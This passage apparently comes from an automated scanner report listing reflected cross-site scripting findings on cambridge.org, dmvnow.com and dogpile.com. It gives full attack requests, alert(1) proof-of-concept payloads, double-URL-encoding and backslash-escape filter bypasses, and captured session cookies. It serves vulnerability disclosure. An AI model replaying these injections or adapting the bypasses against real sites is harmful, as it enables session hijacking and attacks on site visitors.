Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/404_error.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc was submitted in the REST URL parameter 2. This input was echoed as 7de6f<script>alert(1)</script>a0646ab12cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/404_error.asp7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc?error=catalogueimagesecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8439
Date: Fri, 01 Apr 2011 18:16:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>404_error.asp7de6f<script>alert(1)</script>a0646ab12cc?error=catalogueimagesecomm_logo.gif</b>
...[SNIP]...

2.83. http://www.cambridge.org/uk/404_error.asp [error parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/404_error.asp

Issue detail

The value of the error request parameter is copied into the HTML document as plain text between tags. The payload 45ef8<script>alert(1)</script>412bcae565c was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uk/404_error.asp?error=catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c</b>
...[SNIP]...

2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7 was submitted in the REST URL parameter 2. This input was echoed as 9e993<script>alert(1)</script>d0d9917e9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7/images/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue9e993<script>alert(1)</script>d0d9917e9d7imagesecomm_logo.gif</b>
...[SNIP]...

2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e was submitted in the REST URL parameter 3. This input was echoed as 907f0<script>alert(1)</script>d021c5ae35e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimages907f0<script>alert(1)</script>d021c5ae35eecomm_logo.gif</b>
...[SNIP]...

2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 was submitted in the REST URL parameter 4. This input was echoed as b0a13<script>alert(1)</script>7325a07c0e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gifb0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gifb0a13<script>alert(1)</script>7325a07c0e1</b>
...[SNIP]...

2.87. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d56d<a>13f04026c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gif?8d56d<a>13f04026c27=1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8400
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif?8d56d<a>13f04026c27=1</b>
...[SNIP]...

2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/viewBasket.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7 was submitted in the REST URL parameter 2. This input was echoed as 2b0fa<script>alert(1)</script>e38b28956e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7/viewBasket.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue2b0fa<script>alert(1)</script>e38b28956e7viewbasket.asp</b>
...[SNIP]...

2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/viewBasket.asp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a was submitted in the REST URL parameter 3. This input was echoed as 22ad7<script>alert(1)</script>b9863c1a48a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/viewBasket.asp22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueviewbasket.asp22ad7<script>alert(1)</script>b9863c1a48a</b>
...[SNIP]...

2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dmvnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f92"><script>alert(1)</script>946b1b39319 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f92"><script>alert(1)</script>946b1b39319 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 17:21:10 GMT; path=/
Server: Microsoft-IIS/5.0
Date: Fri, 01 Apr 2011 17:21:10 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 17377
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<HTML>
   <HEAD>
           <title>Commonwealth of Virginia Department of
...[SNIP]...
<a class="main" href="/webdoc/utilities/error.asp?

404;http://www.dmvnow.com/favicon.ico88f92"><script>alert(1)</script>946b1b39319&amp;


pf=y">
...[SNIP]...

2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d20\'%3balert(1)//ff63f7f2300 was submitted in the qcat parameter. This input was echoed as c8d20\\';alert(1)//ff63f7f2300 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=webc8d20\'%3balert(1)//ff63f7f2300&qkw= HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7d43bcdc3ae442d4896bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:43 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:43 GMT
Connection: close
Content-Length: 45625
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Webc8d20\\';Alert(1)//Ff63f7f2300/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=7d43bcdc3ae442d4896bc16a3af0cb01&10=1&11=info.dogpl&14=1220
...[SNIP]...

2.92. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96402\'%3balert(1)//a2498f1a00b was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as 96402\\';alert(1)//a2498f1a00b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
Content-Length: 1960
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=8604994ef54a4503a8ebc16a3af0cb01&CookieDomain=.dogpile.com

__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYFBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY
...[SNIP]...
uw8Cmd%2BzyQ0CuYHVhgQCkKvm%2FwUCxNGrzg8CsqH2uAMChuqLpwMCsKGquAMCsaGC3QoCmfTV2gYCs6SaowUCnI%2BIqgQCt56zoQ8C252OhQUCgKHemAoCmu%2FnvgICkPP5CFy2AeMkGJYIpnubvjN9%2BlFgNo94&icePage%24SearchBoxTop%24qcat=Web96402\'%3balert(1)//a2498f1a00b&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=3bbca414522d42f7bc54c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:20 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:19 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45961

